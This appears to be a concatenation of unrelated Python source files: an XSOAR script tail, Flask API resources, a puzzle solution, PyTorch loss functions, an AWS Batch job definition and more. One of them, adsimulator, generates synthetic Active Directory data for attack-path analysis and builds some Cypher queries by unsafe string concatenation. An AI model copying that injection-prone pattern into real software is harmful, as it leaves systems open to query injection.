output = "Output:\n" + str(demisto.get(entry, 'Contents.output')) + \
"Error:\n" + str(demisto.get(entry, 'Contents.error'))
result = 'Failed to query'
tbl.append({'DeviceName': device, 'System': demisto.get(
entry, 'Contents.system'), 'Query result': result, 'Output': output})
except Exception as ex:
res.append({"Type": entryTypes["error"], "ContentsFormat": formats["text"],
"Contents": "Error occurred while parsing output from command. "
"Exception info:\n" + str(ex) + "\n\nInvalid output:\n" + str(resSSH)})
demisto.setContext('CheckpointBackup', devicesBackupStarted)
res.append({"Type": entryTypes["note"], "ContentsFormat": formats["table"], "Contents": tbl})
demisto.results(res)
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
1697601
|
from sqlalchemy.orm.exc import NoResultFound
from flask_rest_jsonapi import ResourceDetail, ResourceList, ResourceRelationship
from flask_rest_jsonapi.exceptions import ObjectNotFound
from commandment.apps.schema import ApplicationManifestSchema, ApplicationSchema, ManagedApplicationSchema
from commandment.apps.models import db, ApplicationManifest, Application, ManagedApplication, AppstoreMacApplication, \
AppstoreiOSApplication, EnterpriseMacApplication, EnterpriseiOSApplication
class ApplicationManifestDetail(ResourceDetail):
schema = ApplicationManifestSchema
data_layer = {
'session': db.session,
'model': ApplicationManifest,
'url_field': 'application_manifest_id'
}
class ApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': Application,
'url_field': 'application_id'
}
class ApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': Application,
'url_field': 'application_id'
}
class ApplicationRelationship(ResourceRelationship):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': Application,
'url_field': 'application_id'
}
class MASApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreMacApplication,
'url_field': 'application_id'
}
class MASApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreMacApplication,
'url_field': 'application_id'
}
class IOSApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreiOSApplication,
'url_field': 'application_id'
}
class IOSApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': AppstoreiOSApplication,
'url_field': 'application_id'
}
class EnterpriseMacApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseMacApplication,
'url_field': 'application_id'
}
class EnterpriseMacApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseMacApplication,
'url_field': 'application_id'
}
class EnterpriseIosApplicationList(ResourceList):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseiOSApplication,
'url_field': 'application_id'
}
class EnterpriseIosApplicationDetail(ResourceDetail):
schema = ApplicationSchema
data_layer = {
'session': db.session,
'model': EnterpriseiOSApplication,
'url_field': 'application_id'
}
class ManagedApplicationDetail(ResourceDetail):
schema = ManagedApplicationSchema
data_layer = {
'session': db.session,
'model': ManagedApplication,
'url_field': 'managed_application_id',
}
class ManagedApplicationList(ResourceList):
def query(self, view_kwargs):
query_ = self.session.query(ManagedApplication)
if view_kwargs.get('application_id') is not None:
try:
self.session.query(Application).filter_by(id=view_kwargs['application_id']).one()
except NoResultFound:
raise ObjectNotFound({'parameter': 'application_id'},
"Application: {} not found".format(view_kwargs['application_id']))
else:
query_ = query_.join(Application).filter(Application.id == view_kwargs['application_id'])
return query_
schema = ManagedApplicationSchema
data_layer = {
'session': db.session,
'model': ManagedApplication,
'url_field': 'managed_application_id',
'methods': {'query': query},
}
class ManagedApplicationRelationship(ResourceRelationship):
schema = ManagedApplicationSchema
data_layer = {
'session': db.session,
'model': ManagedApplication,
'url_field': 'managed_application_id',
}
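# Routing sketch (hedged; the Api instance, view names and URL prefixes are
# illustrative, not defined in this module):
#
#   from flask_rest_jsonapi import Api
#   api = Api(app)
#   api.route(ApplicationList, 'applications_list', '/v1/applications')
#   api.route(ApplicationDetail, 'application_detail',
#             '/v1/applications/<int:application_id>')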
|
1697605
|
from collections import defaultdict
def count_extra_contrib(sufficient_count, n):
extra = 0
for i in range(sufficient_count):
extra += (n-(i+1))
return extra
for _ in range(int(input())):
n = int(input())
count_of_pattern = defaultdict(int)
non_sufficient_patterns = []
cnt = 0
sufficient_count = 0
for i in range(n):
        tmp = input().strip()
        key = ''.join(sorted(set(tmp)))
if(len(key)==5):
sufficient_count += 1
else:
count_of_pattern[key] += 1
non_sufficient_patterns = list(count_of_pattern.keys())
m = len(non_sufficient_patterns)
for i in range(m-1):
lcnt = 0
for j in range(i+1,m):
a = list(non_sufficient_patterns[i])
b = list(non_sufficient_patterns[j])
final_dish = a+b
if(len(set(final_dish))==5):
lcnt += count_of_pattern[non_sufficient_patterns[j]]
cnt += (lcnt * count_of_pattern[non_sufficient_patterns[i]])
del count_of_pattern
print(cnt+count_extra_contrib(sufficient_count, n))
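# Worked example: for n=3 dishes "abcde", "abc", "de", the dish "abcde"
# alone covers all 5 ingredients (sufficient_count=1) and pairs with the
# other 2 dishes, while "abc"+"de" also covers all 5, adding 1 more pair;
# the answer is count_extra_contrib(1, 3) + 1 == 3.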
|
1697656
|
import random
from adsimulator.utils.principals import get_cn, get_sid_from_rid, get_dn
from adsimulator.utils.users import get_user_timestamp, generate_sid_history
from adsimulator.utils.boolean import generate_boolean_value
from adsimulator.utils.parameters import get_perc_param_value, print_user_generation_parameters
from adsimulator.entities.users import get_guest_user, get_default_account, get_administrator_user, get_krbtgt_user,\
get_forest_user_sid_list
from adsimulator.templates.default_values import get_complementary_value
def generate_guest_user(session, domain_name, domain_sid, parameters):
guest_user = get_guest_user(domain_name, domain_sid)
generate_user(session, guest_user, parameters)
def generate_default_account(session, domain_name, domain_sid, parameters):
default_account = get_default_account(domain_name, domain_sid)
generate_user(session, default_account, parameters)
def generate_administrator(session, domain_name, domain_sid, parameters):
administrator_user = get_administrator_user(domain_name, domain_sid)
generate_user(session, administrator_user, parameters)
def generate_krbtgt_user(session, domain_name, domain_sid, parameters):
krbtgt_user = get_krbtgt_user(domain_name, domain_sid)
generate_user(session, krbtgt_user, parameters)
def generate_user(session, user, parameters):
if get_cn(user["Properties"]["name"]) == "GUEST":
enabled_property = random.choice([True, False])
pwdneverexpires_property = random.choice([True, False])
else:
enabled_property = user["Properties"]["enabled"]
pwdneverexpires_property = user["Properties"]["pwdneverexpires"]
# New properties
savedcredentials_perc = get_perc_param_value("User", "savedcredentials", parameters)
savedcredentials = generate_boolean_value(savedcredentials_perc, get_complementary_value(savedcredentials_perc))
session.run(
"""
MERGE (n:Base {name: $name}) SET n:User, n.objectid=$sid,
n.highvalue=$highvalue, n.domain=$domain,
n.distinguishedname=$distinguishedname,
n.description=$description, n.admincount=$admincount,
n.dontreqpreauth=$dontreqpreauth, n.passwordnotreqd=$passwordnotreqd,
n.unconstraineddelegation=$unconstraineddelegation,
n.sensitive=$sensitive, n.enabled=$enabled,
n.pwdneverexpires=$pwdneverexpires, n.lastlogon=$lastlogon,
n.lastlogontimestamp=$lastlogontimestamp, n.pwdlastset=$pwdlastset,
n.serviceprincipalnames=$serviceprincipalnames, n.hasspn=$hasspn,
n.displayname=$displayname, n.email=$email, n.title=$title,
        n.homedirectory=$homedirectory, n.userpassword=$userpassword,
n.sidhistory=$sidhistory, n.savedcredentials=$savedcredentials
""",
name=user["Properties"]["name"],
sid=user["ObjectIdentifier"],
highvalue=user["Properties"]["highvalue"],
domain=user["Properties"]["domain"],
distinguishedname=user["Properties"]["distinguishedname"],
description=user["Properties"]["description"],
admincount=user["Properties"]["admincount"],
dontreqpreauth=user["Properties"]["dontreqpreauth"],
passwordnotreqd=user["Properties"]["passwordnotreqd"],
unconstraineddelegation=user["Properties"]["unconstraineddelegation"],
sensitive=user["Properties"]["sensitive"],
enabled=enabled_property,
pwdneverexpires=pwdneverexpires_property,
lastlogon=user["Properties"]["lastlogon"],
lastlogontimestamp=user["Properties"]["lastlogontimestamp"],
pwdlastset=user["Properties"]["pwdlastset"],
serviceprincipalnames=user["Properties"]["serviceprincipalnames"],
hasspn=user["Properties"]["hasspn"],
displayname=user["Properties"]["displayname"],
email=user["Properties"]["email"],
title=user["Properties"]["title"],
homedirectory=user["Properties"]["homedirectory"],
userpassword=user["Properties"]["userpassword"],
sidhistory=user["Properties"]["sidhistory"],
savedcredentials=savedcredentials
)
def link_default_users_to_domain(session, domain_name, domain_sid):
standard_users_list = get_forest_user_sid_list(domain_name, domain_sid)
for user in standard_users_list:
add_contains_object_on_domain_relationship(session, user)
def add_contains_object_on_domain_relationship(session, ad_object):
query = "MATCH (objectItem:" + ad_object["ObjectType"] + " {objectid: '" + ad_object["ObjectId"] + "'}), (domainItem:Domain {objectid: '" + ad_object["DomainId"] + "'})"
query = query + "\nMERGE (domainItem)-[:Contains {isacl:false}]->(objectItem)"
session.run(query)
def generate_users(session, domain_name, domain_sid, num_nodes, current_time, first_names, last_names, users, ridcount, parameters):
user_properties_list = []
group_name = "DOMAIN USERS@{}".format(domain_name)
enabled_perc = get_perc_param_value("User", "enabled", parameters)
dontreqpreauth_perc = get_perc_param_value("User", "dontreqpreauth", parameters)
hasspn_perc = get_perc_param_value("User", "hasspn", parameters)
passwordnotreqd_perc = get_perc_param_value("User", "passwordnotreqd", parameters)
pwdneverexpires_perc = get_perc_param_value("User", "pwdneverexpires", parameters)
unconstraineddelegation_perc = get_perc_param_value("User", "unconstraineddelegation", parameters)
sidhistory_perc = get_perc_param_value("User", "sidhistory", parameters)
# New properties
savedcredentials_perc = get_perc_param_value("User", "savedcredentials", parameters)
print_user_generation_parameters(enabled_perc, dontreqpreauth_perc, hasspn_perc, passwordnotreqd_perc, pwdneverexpires_perc, unconstraineddelegation_perc, sidhistory_perc)
props = []
for i in range(1, num_nodes + 1):
first = random.choice(first_names)
last = random.choice(last_names)
user_name = "{}{}{:05d}@{}".format(first[0], last, i, domain_name).upper()
user_name = user_name.format(first[0], last, i).upper()
users.append(user_name)
dispname = "{} {}".format(first, last)
enabled = generate_boolean_value(enabled_perc, get_complementary_value(enabled_perc))
dontreqpreauth = generate_boolean_value(dontreqpreauth_perc, get_complementary_value(dontreqpreauth_perc))
hasspn = generate_boolean_value(hasspn_perc, get_complementary_value(hasspn_perc))
passwordnotreqd = generate_boolean_value(passwordnotreqd_perc, get_complementary_value(passwordnotreqd_perc))
pwdneverexpires = generate_boolean_value(pwdneverexpires_perc, get_complementary_value(pwdneverexpires_perc))
unconstraineddelegation = generate_boolean_value(unconstraineddelegation_perc, get_complementary_value(unconstraineddelegation_perc))
sidhistory = generate_sid_history(sidhistory_perc, get_complementary_value(sidhistory_perc))
pwdlastset = get_user_timestamp(current_time, enabled)
lastlogon = get_user_timestamp(current_time, enabled)
objectsid = get_sid_from_rid(ridcount, domain_sid)
# New properties
savedcredentials = generate_boolean_value(savedcredentials_perc, get_complementary_value(savedcredentials_perc))
ridcount += 1
user_property = {
'id': objectsid,
'props': {
'displayname': dispname,
'name': user_name,
'enabled': enabled,
'pwdlastset': pwdlastset,
'lastlogon': lastlogon,
'lastlogontimestamp': lastlogon,
'highvalue': False,
'dontreqpreauth': dontreqpreauth,
'hasspn': hasspn,
                'passwordnotreqd': passwordnotreqd,
'pwdneverexpires': pwdneverexpires,
'sensitive': False,
'serviceprincipalnames': "",
'sidhistory': sidhistory,
'unconstraineddelegation': unconstraineddelegation,
"description": "null",
"admincount": False,
"savedcredentials": savedcredentials
}
}
props.append(user_property)
user_properties_list.append(user_property)
if (len(props) > 500):
session.run('UNWIND $props as prop MERGE (n:Base {objectid:prop.id}) SET n:User, n += prop.props WITH n MATCH (m:Group {name:$gname}) WITH n,m MERGE (n)-[:MemberOf]->(m)', props=props, gname=group_name)
props = []
session.run('UNWIND $props as prop MERGE (n:Base {objectid:prop.id}) SET n:User, n += prop.props WITH n MATCH (m:Group {name:$gname}) WITH n,m MERGE (n)-[:MemberOf {isacl:false}]->(m)', props=props, gname=group_name)
return user_properties_list, users, ridcount
def assign_kerberoastable_users(session, it_users):
i = random.randint(10, 20)
i = min(i, len(it_users))
for user in random.sample(it_users, i):
session.run('MATCH (n:User {name:$user}) SET n.hasspn=true', user=user)
def set_user_dn(session, user_name, ou_dn):
user_dn = get_dn(user_name, ou_dn)
query = "MATCH (n:User { name: '" + user_name + "' }) SET n.distinguishedname = '" + user_dn + "' RETURN n.name, n.distinguishedname"
session.run(query)
|
1697688
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
from .losses import smoothl1_loss, l1_loss, SigmoidFocalClassificationLoss
def compute_points_obj_cls_loss_hard_topk(end_points, topk):
box_label_mask = end_points['box_label_mask']
seed_inds = end_points['seed_inds'].long() # B, K
seed_xyz = end_points['seed_xyz'] # B, K, 3
seeds_obj_cls_logits = end_points['seeds_obj_cls_logits'] # B, 1, K
gt_center = end_points['center_label'][:, :, 0:3] # B, K2, 3
gt_size = end_points['size_gts'][:, :, 0:3] # B, K2, 3
B = gt_center.shape[0]
K = seed_xyz.shape[1]
K2 = gt_center.shape[1]
point_instance_label = end_points['point_instance_label'] # B, num_points
object_assignment = torch.gather(point_instance_label, 1, seed_inds) # B, num_seed
object_assignment[object_assignment < 0] = K2 - 1 # set background points to the last gt bbox
object_assignment_one_hot = torch.zeros((B, K, K2)).to(seed_xyz.device)
object_assignment_one_hot.scatter_(2, object_assignment.unsqueeze(-1), 1) # (B, K, K2)
delta_xyz = seed_xyz.unsqueeze(2) - gt_center.unsqueeze(1) # (B, K, K2, 3)
delta_xyz = delta_xyz / (gt_size.unsqueeze(1) + 1e-6) # (B, K, K2, 3)
new_dist = torch.sum(delta_xyz ** 2, dim=-1)
euclidean_dist1 = torch.sqrt(new_dist + 1e-6) # BxKxK2
euclidean_dist1 = euclidean_dist1 * object_assignment_one_hot + 100 * (1 - object_assignment_one_hot) # BxKxK2
euclidean_dist1 = euclidean_dist1.transpose(1, 2).contiguous() # BxK2xK
topk_inds = torch.topk(euclidean_dist1, topk, largest=False)[1] * box_label_mask[:, :, None] + \
(box_label_mask[:, :, None] - 1) # BxK2xtopk
topk_inds = topk_inds.long() # BxK2xtopk
topk_inds = topk_inds.view(B, -1).contiguous() # B, K2xtopk
batch_inds = torch.arange(B).unsqueeze(1).repeat(1, K2 * topk).to(seed_xyz.device)
batch_topk_inds = torch.stack([batch_inds, topk_inds], -1).view(-1, 2).contiguous()
objectness_label = torch.zeros((B, K + 1), dtype=torch.long).to(seed_xyz.device)
objectness_label[batch_topk_inds[:, 0], batch_topk_inds[:, 1]] = 1
objectness_label = objectness_label[:, :K]
objectness_label_mask = torch.gather(point_instance_label, 1, seed_inds) # B, num_seed
objectness_label[objectness_label_mask < 0] = 0
total_num_points = B * K
end_points[f'points_hard_topk{topk}_pos_ratio'] = \
torch.sum(objectness_label.float()) / float(total_num_points)
end_points[f'points_hard_topk{topk}_neg_ratio'] = 1 - end_points[f'points_hard_topk{topk}_pos_ratio']
# Compute objectness loss
criterion = SigmoidFocalClassificationLoss()
cls_weights = (objectness_label >= 0).float()
cls_normalizer = cls_weights.sum(dim=1, keepdim=True).float()
cls_weights /= torch.clamp(cls_normalizer, min=1.0)
cls_loss_src = criterion(seeds_obj_cls_logits.view(B, K, 1), objectness_label.unsqueeze(-1), weights=cls_weights)
objectness_loss = cls_loss_src.sum() / B
# Compute recall upper bound
padding_array = torch.arange(0, B).to(point_instance_label.device) * 10000
padding_array = padding_array.unsqueeze(1) # B,1
point_instance_label_mask = (point_instance_label < 0) # B,num_points
point_instance_label = point_instance_label + padding_array # B,num_points
point_instance_label[point_instance_label_mask] = -1
num_gt_bboxes = torch.unique(point_instance_label).shape[0] - 1
seed_instance_label = torch.gather(point_instance_label, 1, seed_inds) # B,num_seed
pos_points_instance_label = seed_instance_label * objectness_label + (objectness_label - 1)
num_query_bboxes = torch.unique(pos_points_instance_label).shape[0] - 1
if num_gt_bboxes > 0:
end_points[f'points_hard_topk{topk}_upper_recall_ratio'] = num_query_bboxes / num_gt_bboxes
return objectness_loss
def compute_objectness_loss_based_on_query_points(end_points, num_decoder_layers):
""" Compute objectness loss for the proposals.
"""
if num_decoder_layers > 0:
prefixes = ['proposal_'] + ['last_'] + [f'{i}head_' for i in range(num_decoder_layers - 1)]
else:
prefixes = ['proposal_'] # only proposal
objectness_loss_sum = 0.0
for prefix in prefixes:
# Associate proposal and GT objects
seed_inds = end_points['seed_inds'].long() # B,num_seed in [0,num_points-1]
gt_center = end_points['center_label'][:, :, 0:3] # B, K2, 3
query_points_sample_inds = end_points['query_points_sample_inds'].long()
B = seed_inds.shape[0]
K = query_points_sample_inds.shape[1]
K2 = gt_center.shape[1]
seed_obj_gt = torch.gather(end_points['point_obj_mask'], 1, seed_inds) # B,num_seed
query_points_obj_gt = torch.gather(seed_obj_gt, 1, query_points_sample_inds) # B, query_points
point_instance_label = end_points['point_instance_label'] # B, num_points
seed_instance_label = torch.gather(point_instance_label, 1, seed_inds) # B,num_seed
query_points_instance_label = torch.gather(seed_instance_label, 1, query_points_sample_inds) # B,query_points
objectness_mask = torch.ones((B, K)).cuda()
# Set assignment
object_assignment = query_points_instance_label # (B,K) with values in 0,1,...,K2-1
object_assignment[object_assignment < 0] = K2 - 1 # set background points to the last gt bbox
end_points[f'{prefix}objectness_label'] = query_points_obj_gt
end_points[f'{prefix}objectness_mask'] = objectness_mask
end_points[f'{prefix}object_assignment'] = object_assignment
total_num_proposal = query_points_obj_gt.shape[0] * query_points_obj_gt.shape[1]
end_points[f'{prefix}pos_ratio'] = \
torch.sum(query_points_obj_gt.float().cuda()) / float(total_num_proposal)
end_points[f'{prefix}neg_ratio'] = \
torch.sum(objectness_mask.float()) / float(total_num_proposal) - end_points[f'{prefix}pos_ratio']
# Compute objectness loss
objectness_scores = end_points[f'{prefix}objectness_scores']
criterion = SigmoidFocalClassificationLoss()
cls_weights = objectness_mask.float()
cls_normalizer = cls_weights.sum(dim=1, keepdim=True).float()
cls_weights /= torch.clamp(cls_normalizer, min=1.0)
cls_loss_src = criterion(objectness_scores.transpose(2, 1).contiguous().view(B, K, 1),
query_points_obj_gt.unsqueeze(-1),
weights=cls_weights)
objectness_loss = cls_loss_src.sum() / B
end_points[f'{prefix}objectness_loss'] = objectness_loss
objectness_loss_sum += objectness_loss
return objectness_loss_sum, end_points
def compute_box_and_sem_cls_loss(end_points, config, num_decoder_layers,
center_loss_type='smoothl1', center_delta=1.0,
size_loss_type='smoothl1', size_delta=1.0,
heading_loss_type='smoothl1', heading_delta=1.0,
size_cls_agnostic=False):
""" Compute 3D bounding box and semantic classification loss.
"""
num_heading_bin = config.num_heading_bin
num_size_cluster = config.num_size_cluster
num_class = config.num_class
mean_size_arr = config.mean_size_arr
if num_decoder_layers > 0:
prefixes = ['proposal_'] + ['last_'] + [f'{i}head_' for i in range(num_decoder_layers - 1)]
else:
prefixes = ['proposal_'] # only proposal
box_loss_sum = 0.0
sem_cls_loss_sum = 0.0
for prefix in prefixes:
object_assignment = end_points[f'{prefix}object_assignment']
batch_size = object_assignment.shape[0]
# Compute center loss
pred_center = end_points[f'{prefix}center']
gt_center = end_points['center_label'][:, :, 0:3]
if center_loss_type == 'smoothl1':
objectness_label = end_points[f'{prefix}objectness_label'].float()
object_assignment_expand = object_assignment.unsqueeze(2).repeat(1, 1, 3)
assigned_gt_center = torch.gather(gt_center, 1, object_assignment_expand) # (B, K, 3) from (B, K2, 3)
center_loss = smoothl1_loss(assigned_gt_center - pred_center, delta=center_delta) # (B,K)
center_loss = torch.sum(center_loss * objectness_label.unsqueeze(2)) / (torch.sum(objectness_label) + 1e-6)
elif center_loss_type == 'l1':
objectness_label = end_points[f'{prefix}objectness_label'].float()
object_assignment_expand = object_assignment.unsqueeze(2).repeat(1, 1, 3)
assigned_gt_center = torch.gather(gt_center, 1, object_assignment_expand) # (B, K, 3) from (B, K2, 3)
center_loss = l1_loss(assigned_gt_center - pred_center) # (B,K)
center_loss = torch.sum(center_loss * objectness_label.unsqueeze(2)) / (torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
# Compute heading loss
heading_class_label = torch.gather(end_points['heading_class_label'], 1,
object_assignment) # select (B,K) from (B,K2)
criterion_heading_class = nn.CrossEntropyLoss(reduction='none')
heading_class_loss = criterion_heading_class(end_points[f'{prefix}heading_scores'].transpose(2, 1),
heading_class_label) # (B,K)
heading_class_loss = torch.sum(heading_class_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
heading_residual_label = torch.gather(end_points['heading_residual_label'], 1,
object_assignment) # select (B,K) from (B,K2)
heading_residual_normalized_label = heading_residual_label / (np.pi / num_heading_bin)
# Ref: https://discuss.pytorch.org/t/convert-int-into-one-hot-format/507/3
heading_label_one_hot = torch.cuda.FloatTensor(batch_size, heading_class_label.shape[1],
num_heading_bin).zero_()
heading_label_one_hot.scatter_(2, heading_class_label.unsqueeze(-1),
1) # src==1 so it's *one-hot* (B,K,num_heading_bin)
heading_residual_normalized_error = torch.sum(
end_points[f'{prefix}heading_residuals_normalized'] * heading_label_one_hot,
-1) - heading_residual_normalized_label
if heading_loss_type == 'smoothl1':
heading_residual_normalized_loss = heading_delta * smoothl1_loss(heading_residual_normalized_error,
delta=heading_delta) # (B,K)
heading_residual_normalized_loss = torch.sum(
heading_residual_normalized_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
elif heading_loss_type == 'l1':
heading_residual_normalized_loss = l1_loss(heading_residual_normalized_error) # (B,K)
heading_residual_normalized_loss = torch.sum(
heading_residual_normalized_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
# Compute size loss
if size_cls_agnostic:
pred_size = end_points[f'{prefix}pred_size']
size_label = torch.gather(
end_points['size_gts'], 1,
object_assignment.unsqueeze(-1).repeat(1, 1, 3)) # select (B,K,3) from (B,K2,3)
size_error = pred_size - size_label
if size_loss_type == 'smoothl1':
size_loss = size_delta * smoothl1_loss(size_error,
delta=size_delta) # (B,K,3) -> (B,K)
size_loss = torch.sum(size_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
elif size_loss_type == 'l1':
size_loss = l1_loss(size_error) # (B,K,3) -> (B,K)
size_loss = torch.sum(size_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
else:
size_class_label = torch.gather(end_points['size_class_label'], 1,
object_assignment) # select (B,K) from (B,K2)
criterion_size_class = nn.CrossEntropyLoss(reduction='none')
size_class_loss = criterion_size_class(end_points[f'{prefix}size_scores'].transpose(2, 1),
size_class_label) # (B,K)
size_class_loss = torch.sum(size_class_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
size_residual_label = torch.gather(
end_points['size_residual_label'], 1,
object_assignment.unsqueeze(-1).repeat(1, 1, 3)) # select (B,K,3) from (B,K2,3)
size_label_one_hot = torch.cuda.FloatTensor(batch_size, size_class_label.shape[1], num_size_cluster).zero_()
size_label_one_hot.scatter_(2, size_class_label.unsqueeze(-1),
1) # src==1 so it's *one-hot* (B,K,num_size_cluster)
size_label_one_hot_tiled = size_label_one_hot.unsqueeze(-1).repeat(1, 1, 1, 3) # (B,K,num_size_cluster,3)
predicted_size_residual_normalized = torch.sum(
end_points[f'{prefix}size_residuals_normalized'] * size_label_one_hot_tiled,
2) # (B,K,3)
mean_size_arr_expanded = torch.from_numpy(mean_size_arr.astype(np.float32)).cuda().unsqueeze(0).unsqueeze(
0) # (1,1,num_size_cluster,3)
mean_size_label = torch.sum(size_label_one_hot_tiled * mean_size_arr_expanded, 2) # (B,K,3)
size_residual_label_normalized = size_residual_label / mean_size_label # (B,K,3)
size_residual_normalized_error = predicted_size_residual_normalized - size_residual_label_normalized
if size_loss_type == 'smoothl1':
size_residual_normalized_loss = size_delta * smoothl1_loss(size_residual_normalized_error,
delta=size_delta) # (B,K,3) -> (B,K)
size_residual_normalized_loss = torch.sum(
size_residual_normalized_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
elif size_loss_type == 'l1':
size_residual_normalized_loss = l1_loss(size_residual_normalized_error) # (B,K,3) -> (B,K)
size_residual_normalized_loss = torch.sum(
size_residual_normalized_loss * objectness_label.unsqueeze(2)) / (
torch.sum(objectness_label) + 1e-6)
else:
raise NotImplementedError
# 3.4 Semantic cls loss
sem_cls_label = torch.gather(end_points['sem_cls_label'], 1, object_assignment) # select (B,K) from (B,K2)
criterion_sem_cls = nn.CrossEntropyLoss(reduction='none')
sem_cls_loss = criterion_sem_cls(end_points[f'{prefix}sem_cls_scores'].transpose(2, 1), sem_cls_label) # (B,K)
sem_cls_loss = torch.sum(sem_cls_loss * objectness_label) / (torch.sum(objectness_label) + 1e-6)
end_points[f'{prefix}center_loss'] = center_loss
end_points[f'{prefix}heading_cls_loss'] = heading_class_loss
end_points[f'{prefix}heading_reg_loss'] = heading_residual_normalized_loss
if size_cls_agnostic:
end_points[f'{prefix}size_reg_loss'] = size_loss
box_loss = center_loss + 0.1 * heading_class_loss + heading_residual_normalized_loss + size_loss
else:
end_points[f'{prefix}size_cls_loss'] = size_class_loss
end_points[f'{prefix}size_reg_loss'] = size_residual_normalized_loss
box_loss = center_loss + 0.1 * heading_class_loss + heading_residual_normalized_loss + 0.1 * size_class_loss + size_residual_normalized_loss
end_points[f'{prefix}box_loss'] = box_loss
end_points[f'{prefix}sem_cls_loss'] = sem_cls_loss
box_loss_sum += box_loss
sem_cls_loss_sum += sem_cls_loss
return box_loss_sum, sem_cls_loss_sum, end_points
def get_loss(end_points, config, num_decoder_layers,
query_points_generator_loss_coef, obj_loss_coef, box_loss_coef, sem_cls_loss_coef,
query_points_obj_topk=5,
center_loss_type='smoothl1', center_delta=1.0,
size_loss_type='smoothl1', size_delta=1.0,
heading_loss_type='smoothl1', heading_delta=1.0,
size_cls_agnostic=False):
""" Loss functions
"""
if 'seeds_obj_cls_logits' in end_points.keys():
query_points_generation_loss = compute_points_obj_cls_loss_hard_topk(end_points, query_points_obj_topk)
end_points['query_points_generation_loss'] = query_points_generation_loss
else:
query_points_generation_loss = 0.0
# Obj loss
objectness_loss_sum, end_points = \
compute_objectness_loss_based_on_query_points(end_points, num_decoder_layers)
end_points['sum_heads_objectness_loss'] = objectness_loss_sum
# Box loss and sem cls loss
box_loss_sum, sem_cls_loss_sum, end_points = compute_box_and_sem_cls_loss(
end_points, config, num_decoder_layers,
center_loss_type, center_delta=center_delta,
size_loss_type=size_loss_type, size_delta=size_delta,
heading_loss_type=heading_loss_type, heading_delta=heading_delta,
size_cls_agnostic=size_cls_agnostic)
end_points['sum_heads_box_loss'] = box_loss_sum
end_points['sum_heads_sem_cls_loss'] = sem_cls_loss_sum
# means average proposal with prediction loss
loss = query_points_generator_loss_coef * query_points_generation_loss + \
1.0 / (num_decoder_layers + 1) * (
obj_loss_coef * objectness_loss_sum + box_loss_coef * box_loss_sum + sem_cls_loss_coef * sem_cls_loss_sum)
loss *= 10
end_points['loss'] = loss
return loss, end_points
|
1697696
|
def get_job_definition(account, region, container_name, job_def_name, job_param_s3uri_destination, memoryInMB, ncpus,
role_name):
"""
    Builds the AWS Batch job definition for this sample inference job.
    :param account: AWS account id the job runs in.
    :param region: AWS region name.
    :param container_name: container image URI to run.
    :param job_def_name: name to register the job definition under.
    :param job_param_s3uri_destination: default S3 URI used for the job's
        s3src/s3destination/s3network parameters.
    :param memoryInMB: memory to reserve for the container, in MiB.
    :param ncpus: number of vCPUs to reserve for the container.
    :param role_name: name of the IAM role the container assumes.
    :return: a job definition dict accepted by batch.register_job_definition.
"""
return {
"jobDefinitionName": job_def_name,
"type": "container",
# These are the arguments for the job
"parameters": {
"localpath": "/data",
"s3destination": job_param_s3uri_destination,
"s3src": job_param_s3uri_destination,
"s3network": job_param_s3uri_destination,
"networktype": "CnnPos",
"threshold": "0.0"
},
# Specify container & jobs properties include entry point and job args that are referred to in parameters
"containerProperties": {
"image": container_name,
"vcpus": ncpus,
"memory": memoryInMB,
"command": [
"bash",
"scripts/inference.sh",
"Ref::s3src",
"Ref::s3destination",
"Ref::s3network",
"Ref::networktype",
"Ref::localpath",
"Ref::threshold"
],
"jobRoleArn": "arn:aws:iam::{}:role/{}".format(account, role_name),
"volumes": [
{
"host": {
"sourcePath": "/dev/shm"
},
"name": "data"
}
],
"environment": [
{
"name": "AWS_DEFAULT_REGION",
"value": region
}
],
"mountPoints": [
{
"containerPath": "/data",
"readOnly": False,
"sourceVolume": "data"
}
],
"readonlyRootFilesystem": False,
"privileged": True,
"ulimits": [],
"user": ""
},
"retryStrategy": {
"attempts": 5
}
}
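# Registration sketch (hedged; account/region/image/role values are
# placeholders):
#
#   import boto3
#   batch = boto3.client('batch', region_name='us-east-1')
#   job_def = get_job_definition(
#       account='123456789012', region='us-east-1',
#       container_name='123456789012.dkr.ecr.us-east-1.amazonaws.com/inference:latest',
#       job_def_name='sample-inference',
#       job_param_s3uri_destination='s3://my-bucket/results/',
#       memoryInMB=16000, ncpus=4, role_name='BatchJobRole')
#   batch.register_job_definition(**job_def)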
|
1697711
|
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Assets.Objects.FText import FText
class FNavAgentSelectorCustomization:
SupportedDesc: FText
def __init__(self, reader: BinaryStream):
self.SupportedDesc = FText(reader)
|
1697728
|
import pandas as pd
from shapely.geometry import LineString, Point
from syspy.spatial import spatial, zoning
from syspy.transitfeed import feed_links
# seconds
def to_seconds(time_string):
return pd.to_timedelta(time_string).total_seconds()
def point_geometry(row):
